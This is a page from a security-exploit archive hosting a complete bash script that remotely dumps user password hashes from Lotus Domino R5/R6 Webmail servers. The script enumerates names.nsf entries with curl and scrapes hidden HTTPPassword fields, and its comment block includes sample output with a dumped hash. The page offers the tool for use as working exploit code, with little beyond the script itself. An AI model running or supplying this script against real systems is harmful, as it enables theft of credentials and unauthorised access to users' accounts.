what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

lotus.sh.txt

lotus.sh.txt
Posted Feb 14, 2007
Authored by Marco Ivaldi

Lotus Domino versions R6 and below Webmail remote password hash dumper exploit.

tags | exploit, remote
SHA-256 | ad22d459010ddc2813609f50832c4ec30e103ff1c2e8748027b6e972b7278f8f

lotus.sh.txt

Change Mirror Download
!/bin/bash

#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName: Foo
# LastName: Bar
# ShortName: fbar
# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#

# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp

# Command line
host=$1

# Local fuctions
function header() {
echo ""
echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
echo "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo ""
}

function footer() {
echo ""
exit 0
}

function usage() {
header
echo "usage : ./raptor_dominohash <host>"
echo "example: ./raptor_dominohash 192.168.0.202"
footer
}

function notfound() {
header
echo "error : curl not found"
footer
}

# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi

# Input control
if [ -z "$1" ]; then
usage
fi

# Remove temporary files
rm -f $tmp1
rm -f $tmp2

header

# Extract the view entries
echo "Extracting the view entries..."
while :
do
curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1

# Check grep return value
if [ $? -ne 0 ]; then
break
fi

# Go for the next page
i=`expr $i + 30`
echo -ne "\b\b\b\b\b\b\b\b$i"
done

cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2

# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
echo "No entries found on host ${host}!"
footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""

# Perform the hash dumping
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
echo ""
#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
echo ""
done

footer

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close